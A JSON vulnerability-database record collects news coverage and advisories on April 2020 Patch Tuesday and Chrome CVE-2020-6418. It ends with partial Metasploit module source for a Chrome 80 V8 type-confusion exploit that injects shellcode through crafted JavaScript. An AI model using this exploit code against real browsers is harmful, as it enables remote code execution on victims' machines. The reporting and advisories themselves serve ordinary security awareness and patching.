"cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*"]}], "krebs": [{"lastseen": "2020-04-18T09:42:02", "description": "**Microsoft** today released updates to fix 113 security vulnerabilities in its various **Windows** operating systems and related software. Those include at least three flaws that are actively being exploited, as well as two others which were publicly detailed prior to today, potentially giving attackers a head start in figuring out how to exploit the bugs.\n\n![](https://krebsonsecurity.com/wp-content/uploads/2014/07/brokenwindows.png)Nineteen of the weaknesses fixed on this Patch Tuesday were assigned Microsoft's most-dire \u201ccritical\u201d rating, meaning malware or miscreants could exploit them to gain complete, remote control over vulnerable computers without any help from users.\n\nNear the top of the heap is [CVE-2020-1020](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1020>), a remotely exploitable bug in the **Adobe Font Manager** library that was first detailed in late March when Microsoft said it had seen the flaw being used in active attacks.\n\nThe Adobe Font Manager library is the source of yet another zero-day flaw -- [CVE-2020-0938](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0938>) -- although experts at security vendor **Tenable** say there is currently no confirmation that the two are related to the same set of in-the-wild attacks. Both flaws could be exploited by getting a Windows users to open a booby-trapped document or viewing one in the Windows Preview Pane.\n\nThe other zero-day flaw ([CVE-2020-1027](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1027>)) affects **Windows 7** and **Windows 10 systems**, and earned a slightly less dire \"important\" rating from Microsoft because it's an \"elevation of privilege\" bug that requires the attacker to be locally authenticated.\n\nMany security news sites are reporting that Microsoft addressed a total of four zero-day flaws this month, but it appears the advisory for a critical Internet Explorer flaw ([CVE-2020-0968](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0968>)) has been revised to indicate Microsoft has not yet received reports of it being used in active attacks. However, the advisory says this IE bug is likely to be exploited soon.\n\nResearchers at security firm **Recorded Future** zeroed in on [CVE-2020-0796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>), a critical vulnerability dubbed \"SMBGhost\" that was rumored to exist in last month's Patch Tuesday but for which an out-of-band patch wasn't released until March 12. The problem resides in a file-sharing component of Windows, and could be exploited merely by sending the victim machine specially-crafted data packets. Proof-of-concept code showing how to exploit the bug was released April 1, but so far there are no indications this method has been incorporated into malware or active attacks.\n\nRecorded Future's **Allan Liska** notes that one reason these past few months have seen so many patches from Microsoft is the company [recently hired \"SandboxEscaper,\"](<https://twitter.com/SandboxBear/status/1210133985478791171>) a nickname used by the security researcher responsible for [releasing more than a half-dozen zero-day flaws](<https://arstechnica.com/information-technology/2019/05/serial-publisher-of-windows-0days-drops-exploits-for-3-more-unfixed-flaws/>) against Microsoft products last year.\n\n\"SandboxEscaper has made several contributions to this month\u2019s Patch Tuesday,\" Liska said. \"This is great news for Microsoft and the security community at large.\"\n\nOnce again, Adobe has blessed us with a respite from updating its Flash Player program with security fixes. I look forward to the end of this year, when the company has promised to sunset this buggy and insecure program once and for all. Adobe did release security updates for its [ColdFusion, After Effects and Digital Editions software](<https://blogs.adobe.com/psirt/?p=1859>).\n\nSpeaking of buggy software platforms, **Oracle** has released a quarterly patch update to fix more than 400 security flaws across multiple products, including its **Java SE** program. If you've got Java installed and you need/want to keep it installed, please [make sure it's up-to-date](<https://java.com/en/download/help/java_update.xml#manual>).\n\nNow for my obligatory disclaimers. Just a friendly reminder that while many of the vulnerabilities fixed in today\u2019s Microsoft patch batch affect Windows 7 operating systems -- including all three of the zero-day flaws -- this OS is no longer being supported with security updates (unless you\u2019re an enterprise taking advantage of Microsoft\u2019s [paid extended security updates program](<https://support.microsoft.com/en-us/help/4527878/faq-about-extended-security-updates-for-windows-7>), which is available to Windows 7 Professional and Windows 7 enterprise users).\n\nIf you rely on Windows 7 for day-to-day use, it\u2019s to think about upgrading to something newer. That something might be a computer with Windows 10. Or maybe you have always wanted that shiny MacOS computer.\n\nIf cost is a primary motivator and the user you have in mind doesn\u2019t do much with the system other than browsing the Web, perhaps a **Chromebook** or an older machine with a recent version of **Linux** is the answer (Ubuntu may be easiest for non-Linux natives). Whichever system you choose, it\u2019s important to pick one that fits the owner\u2019s needs and provides security updates on an ongoing basis.\n\nKeep in mind that while staying up-to-date on Windows patches is a must, it\u2019s important to make sure you\u2019re updating only after you\u2019ve backed up your important data and files. A reliable backup means you\u2019re not losing your mind when the odd buggy patch causes problems booting the system.\n\nSo do yourself a favor and backup your files before installing any patches. Windows 10 even has [some built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.\n\nAs always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips. Also, keep an eye on the [AskWoody blog](<https://www.askwoody.com/2020/february-2020-patch-tuesday-foibles/>) from **Woody Leonhard**, who keeps a close eye on buggy Microsoft updates each month.\n\nFurther reading:\n\n[Qualys breakdown on April 2020 Patch Tuesday](<https://blog.qualys.com/laws-of-vulnerabilities/2020/04/14/april-2020-patch-tuesday-113-vulns-19-critical-0-day-patches-sharepoint-adobe-coldfusion>)\n\n[SANS Internet Storm Center on Patch Tuesday](<https://isc.sans.org/forums/diary/Microsoft+April+2020+Patch+Tuesday/26022/>)", "edition": 2, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-14T22:24:10", "type": "krebs", "title": "Microsoft Patch Tuesday, April 2020 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-1020", "CVE-2020-1027"], "modified": "2020-04-14T22:24:10", "id": "KREBS:1093D39181F7F724932AED0E8DA017A8", "href": "https://krebsonsecurity.com/2020/04/microsoft-patch-tuesday-april-2020-edition/", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:38:31", "description": "[![Windows Update](https://thehackernews.com/images/-YJ1LqrMMEaM/XpX_UksqOuI/AAAAAAAA2qE/3LZJABtjRK0FvjSyceDePk_slKHxeWYmACLcBGAsYHQ/s728-e100/windows-update.jpg)](<https://thehackernews.com/images/-YJ1LqrMMEaM/XpX_UksqOuI/AAAAAAAA2qE/3LZJABtjRK0FvjSyceDePk_slKHxeWYmACLcBGAsYHQ/s728-e100/windows-update.jpg>)\n\nIt's **April 2020 Patch Tuesday**, and during these challenging times of coronavirus pandemic, this month's patch management process would not go easy for many organizations where most of the resources are working remotely. \n \nMicrosoft today [released](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/2020-Apr>) the latest batch of software security updates for all supported versions of its Windows operating systems and other products that patch a total of 113 new security vulnerabilities, 17 of which are critical and 96 rated important in severity. \n \n\n\n## Patches for 4 Zero-Days Exploited In the Wild\n\n \nMost importantly, [two of the security flaws](<https://thehackernews.com/2020/03/windows-adobe-font-vulnerability.html>) have been reported as being publicly known at the time of release, and the 3 are being actively exploited in the wild by hackers. \n \nOne of the publicly disclosed flaws, which was also exploited as zero-day, resides in the Adobe Font Manager Library used by Windows, the existence of which Microsoft revealed last month within an early security warning for its millions of users. \n \nTracked as [CVE-2020-1020](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1020>), the remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format. \n \nAs explained in the [previous post](<https://thehackernews.com/2020/03/windows-adobe-font-vulnerability.html>), the affected font library not only parses content when open with a 3rd-party software but also is used by Windows Explorer to display the content of a file in the 'Preview Pane' or 'Details Pane' without having users to open it. \n \nThe second in-the-wild exploited remote code execution flaw ([CVE-2020-0938](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0938>)) also resides in the Adobe Type Manager Library that triggers when parsing a malicious OpenType font. \n \nBoth of these zero-day flaws were [reported](<https://twitter.com/itswillis/status/1250116355602419713>) to Microsoft in the last week of March by researchers working with Google Project Zero but with a very short full disclosure deadline, which was then mutually extended considering the current global circumstances. \n \nThe third zero-day is an elevation of privilege vulnerability ([CVE-2020-1027](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1027>)) in Windows kernel, discovered by the Google Project Zero team, that impacts all supported versions of the Windows operating system\u2014including Windows 10, 8.1 and Server 2008, 2012, 2016, and 2019 editions, as well as Windows 7 for which Microsoft ended its support in January 2020. \n \n\n\n## Other New Bugs Microsoft Patched this Month\n\n \nThe second publicly known issue, which was not exploited in the wild, is an important elevation of privilege vulnerability ([CVE-2020-0935](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0935>)) that resides in the OneDrive for Windows desktop. \n \nThe latest update also includes patches for 5 critical flaws that affect Microsoft Office SharePoint, 4 of which exists due to the failure of the software to check the source markup of an application package, allowing remote attackers to execute arbitrary code on the affected machines. \n \nWhereas, the 5th SharePoint flaw is a cross-site-scripting (XSS) issue (**CVE-2020-0927**) that can be exploited by an authenticated attacker by sending a specially crafted request to an affected SharePoint server. \n \nThere's another notable flaw, tracked as **CVE-2020-0910 **and rated critical, that affects Windows Hyper-V, allowing a guest virtual machine to compromise the hypervisor, escaping from a guest virtual machine to the host, or escaping from one guest virtual machine to another guest virtual machine. \n \nBesides these, other critical flaws Microsoft patched this month affect Chakra scripting engine, Microsoft Dynamics 365 Business Central, media foundation, graphics components, codecs library and VBScript\u2014all leading to remote code execution attacks. \n \nWindows users and system administrators are highly advised to apply the latest security patches as soon as possible in an attempt to keep cybercriminals and hackers away from taking control of their computers. \n \nFor installing the latest Windows security updates, you can head on to Settings \u2192 Update & Security \u2192 Windows Update \u2192 Check for updates on your PC, or you can install the updates manually. \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-14T18:24:00", "type": "thn", "title": "Microsoft Issues Patches for 3 Bugs Exploited as Zero-Day in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 5.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.7, "vectorString": "AV:A/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0910", "CVE-2020-0927", "CVE-2020-0935", "CVE-2020-0938", "CVE-2020-1020", "CVE-2020-1027"], "modified": "2020-04-15T11:05:48", "id": "THN:D8AAE3E21499FA77C4C1B73C1DDA01E1", "href": "https://thehackernews.com/2020/04/windows-patch-update.html", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:36", "description": "[![chrome browser software update](https://thehackernews.com/images/-TpSAclc1CUY/XlUH-042UlI/AAAAAAAA2a8/rZXeX3W340I8FcHae_U9qtF8muP0p7aUQCLcBGAsYHQ/s728-e100/chrome-browser-software-update.jpg)](<https://thehackernews.com/images/-TpSAclc1CUY/XlUH-042UlI/AAAAAAAA2a8/rZXeX3W340I8FcHae_U9qtF8muP0p7aUQCLcBGAsYHQ/s728-e100/chrome-browser-software-update.jpg>)\n\nGoogle yesterday released a new critical software update for its Chrome web browser for desktops that will be rolled out to Windows, Mac, and Linux users over the next few days. \n \nThe latest Chrome 80.0.3987.122 includes security fixes for [three new vulnerabilities](<https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop_24.html>), all of which have been marked 'HIGH' in severity, including one that (CVE-2020-6418) has been reportedly exploited in the wild. \n \nThe brief description of the Chrome bugs, which impose a significant risk to your systems if left unpatched, are as follows: \n \n\n\n * **Integer overflow in ICU** \u2014 Reported by Andr\u00e9 Bargull on 2020-01-22\n * **Out of bounds memory access in streams (CVE-2020-6407)** \u2014 Reported by Sergei Glazunov of Google Project Zero on 2020-01-27\n * **Type confusion in V8 (CVE-2020-6418) **\u2014 Reported by Clement Lecigne of Google's Threat Analysis Group on 2020-02-18\n \n \nThe Integer Overflow vulnerability was disclosed by Andr\u00e9 Bargull privately to Google last month, earning him $5,000 in rewards, while the other two vulnerabilities \u2014 CVE-2020-6407 and CVE-2020-6418 \u2014 were identified by experts from the Google security team. \n \nGoogle has said CVE-2020-6418, which stems from a type confusion error in its V8 JavaScript rendering engine, is being actively exploited, although technical information about the vulnerability is restricted at this time. \n \nThe search giant has not disclosed further details of the vulnerabilities so that it gives affected users enough time to install the Chrome update and prevent hackers from exploiting them. \n \nA successful exploitation of the integer overflow or out-of-bounds write flaws could allow a remote attacker to compromise a vulnerable system by tricking the user into visiting a specially crafted web page that takes advantage of the exploit to execute arbitrary code on the target system. \n \nIt's recommended that Windows, Linux, and macOS users [download and install the latest version](<https://support.google.com/chrome/answer/95414?co=GENIE.Platform%3DDesktop&hl=en>) of Chrome by heading to Help > \"About Chrome\" from the settings menu.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-02-25T11:47:00", "type": "thn", "title": "Install Latest Chrome Update to Patch 0-Day Bug Under Active Attacks", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "modified": "2020-02-25T11:47:01", "id": "THN:DC209DD441842FCD2682680F22D67854", "href": "https://thehackernews.com/2020/02/google-chrome-zero-day.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-03-31T23:35:46", "description": "A type confusion vulnerability exists in Google Chrome. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-02-27T00:00:00", "type": "checkpoint_advisories", "title": "Google Chrome Type Confusion (CVE-2020-6418)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6418"], "modified": "2021-01-25T00:00:00", "id": "CPAI-2020-0097", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-11-09T15:18:12", "description": "A remote code execution vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-14T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft OpenType Font Parsing Remote Code Execution (CVE-2020-0938)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0938"], "modified": "2022-11-09T00:00:00", "id": "CPAI-2020-0195", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:40:54", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-14T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows Kernel Elevation of Privilege (CVE-2020-1027)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1027"], "modified": "2020-04-14T00:00:00", "id": "CPAI-2020-0258", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-16T19:37:24", "description": "A remote code execution vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-14T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Font Manager Library Remote Code Execution Vulnerability (CVE-2020-1020)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1020"], "modified": "2020-10-25T00:00:00", "id": "CPAI-2020-0197", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2023-01-28T06:04:17", "description": "Type confusion in V8 in Google Chrome prior to 80.0.3987.122 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-02-27T23:15:00", "type": "debiancve", "title": "CVE-2020-6418", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6418"], "modified": "2020-02-27T23:15:00", "id": "DEBIANCVE:CVE-2020-6418", "href": "https://security-tracker.debian.org/tracker/CVE-2020-6418", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2022-11-03T04:47:40", "description": "This module exploits an issue in Google Chrome 80.0.3987.87 (64 bit). The exploit corrupts the length of a float array (float_rel), which can then be used for out of bounds read and write on adjacent memory. The relative read and write is then used to modify a UInt64Array (uint64_aarw) which is used for read and writing from absolute memory. The exploit then uses WebAssembly in order to allocate a region of RWX memory, which is then replaced with the payload shellcode. The payload is executed within the sandboxed renderer process, so the browser must be run with the --no-sandbox option for the payload to work correctly.\n", "cvss3": {}, "published": "2020-02-29T10:41:04", "type": "metasploit", "title": "Google Chrome 80 JSCreate side-effect type confusion exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-6418"], "modified": "2022-02-16T11:48:55", "id": "MSF:EXPLOIT-MULTI-BROWSER-CHROME_JSCREATE_SIDEEFFECT-", "href": "https://www.rapid7.com/db/modules/exploit/multi/browser/chrome_jscreate_sideeffect/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Post::File\n include Msf::Exploit::Remote::HttpServer::BrowserExploit\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Google Chrome 80 JSCreate side-effect type confusion exploit',\n 'Description' => %q{\n This module exploits an issue in Google Chrome 80.0.3987.87 (64 bit). The exploit\n corrupts the length of a float array (float_rel), which can then be used for out\n of bounds read and write on adjacent memory.\n The relative read and write is then used to modify a UInt64Array (uint64_aarw)\n which is used for read and writing from absolute memory.\n The exploit then uses WebAssembly in order to allocate a region of RWX memory,\n which is then replaced with the payload shellcode.\n The payload is executed within the sandboxed renderer process, so the browser\n must be run with the --no-sandbox option for the payload to work correctly.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Cl\u00e9ment Lecigne', # discovery\n 'Istv\u00e1n Kurucsai', # exploit\n 'Vignesh S Rao', # exploit\n 'timwr', # metasploit copypasta\n ],\n 'References' => [\n ['CVE', '2020-6418'],\n ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=1053604'],\n ['URL', 'https://blog.exodusintel.com/2020/02/24/a-eulogy-for-patch-gapping'],\n ['URL', 'https://ray-cp.github.io/archivers/browser-pwn-cve-2020-6418%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90'],\n ],\n 'Arch' => [ ARCH_X64 ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'SideEffects' => [ IOC_IN_LOGS ],\n 'Stability' => [CRASH_SAFE]\n },\n 'Targets' =>\n [\n ['Windows 10 - Google Chrome 80.0.3987.87 (64 bit)', {'Platform' => 'win'}],\n ['macOS - Google Chrome 80.0.3987.87 (64 bit)', {'Platform' => 'osx'}],\n ],\n 'DisclosureDate' => '2020-02-19'))\n end\n\n def on_request_uri(cli, request)\n print_status(\"Sending #{request.uri} to #{request['User-Agent']}\")\n escaped_payload = Rex::Text.to_unescape(payload.raw)\n jscript = %Q^\nvar shellcode = unescape(\"#{escaped_payload}\");\n\n// HELPER FUNCTIONS\nlet conversion_buffer = new ArrayBuffer(8);\nlet float_view = new Float64Array(conversion_buffer);\nlet int_view = new BigUint64Array(conversion_buffer);\nBigInt.prototype.hex = function() {\n return '0x' + this.toString(16);\n};\nBigInt.prototype.i2f = function() {\n int_view[0] = this;\n return float_view[0];\n}\nBigInt.prototype.smi2f = function() {\n int_view[0] = this << 32n;\n return float_view[0];\n}\nNumber.prototype.f2i = function() {\n float_view[0] = this;\n return int_view[0];\n}\nNumber.prototype.f2smi = function() {\n float_view[0] = this;\n return int_view[0] >> 32n;\n}\n\nNumber.prototype.fhw = function() {\n float_view[0] = this;\n return int_view[0] >> 32n;\n}\n\nNumber.prototype.flw = function() {\n float_view[0] = this;\n return int_view[0] & BigInt(2**32-1);\n}\n\nNumber.prototype.i2f = function() {\n return BigInt(this).i2f();\n}\nNumber.prototype.smi2f = function() {\n return BigInt(this).smi2f();\n}\n\nfunction hex(a) {\n return a.toString(16);\n}\n\n//\n// EXPLOIT\n//\n\n// the number of holes here determines the OOB write offset\nlet vuln = [0.1, ,,,,,,,,,,,,,,,,,,,,,, 6.1, 7.1, 8.1];\nvar float_rel; // float array, initially corruption target\nvar float_carw; // float array, used for reads/writes within the compressed heap\nvar uint64_aarw; // uint64 typed array, used for absolute reads/writes in the entire address space\nvar obj_leaker; // used to implement addrof\nvuln.pop();\nvuln.pop();\nvuln.pop();\n\nfunction empty() {}\n\nfunction f(nt) {\n // The compare operation enforces an effect edge between JSCreate and Array.push, thus introducing the bug\n vuln.push(typeof(Reflect.construct(empty, arguments, nt)) === Proxy ? 0.2 : 156842065920.05);\n for (var i = 0; i < 0x10000; ++i) {};\n}\n\nlet p = new Proxy(Object, {\n get: function() {\n vuln[0] = {};\n float_rel = [0.2, 1.2, 2.2, 3.2, 4.3];\n float_carw = [6.6];\n uint64_aarw = new BigUint64Array(4);\n obj_leaker = {\n a: float_rel,\n b: float_rel,\n };\n\n return Object.prototype;\n }\n});\n\nfunction main(o) {\n for (var i = 0; i < 0x10000; ++i) {};\n return f(o);\n}\n\n// reads 4 bytes from the compressed heap at the specified dword offset after float_rel\nfunction crel_read4(offset) {\n var qw_offset = Math.floor(offset / 2);\n if (offset & 1 == 1) {\n return float_rel[qw_offset].fhw();\n } else {\n return float_rel[qw_offset].flw();\n 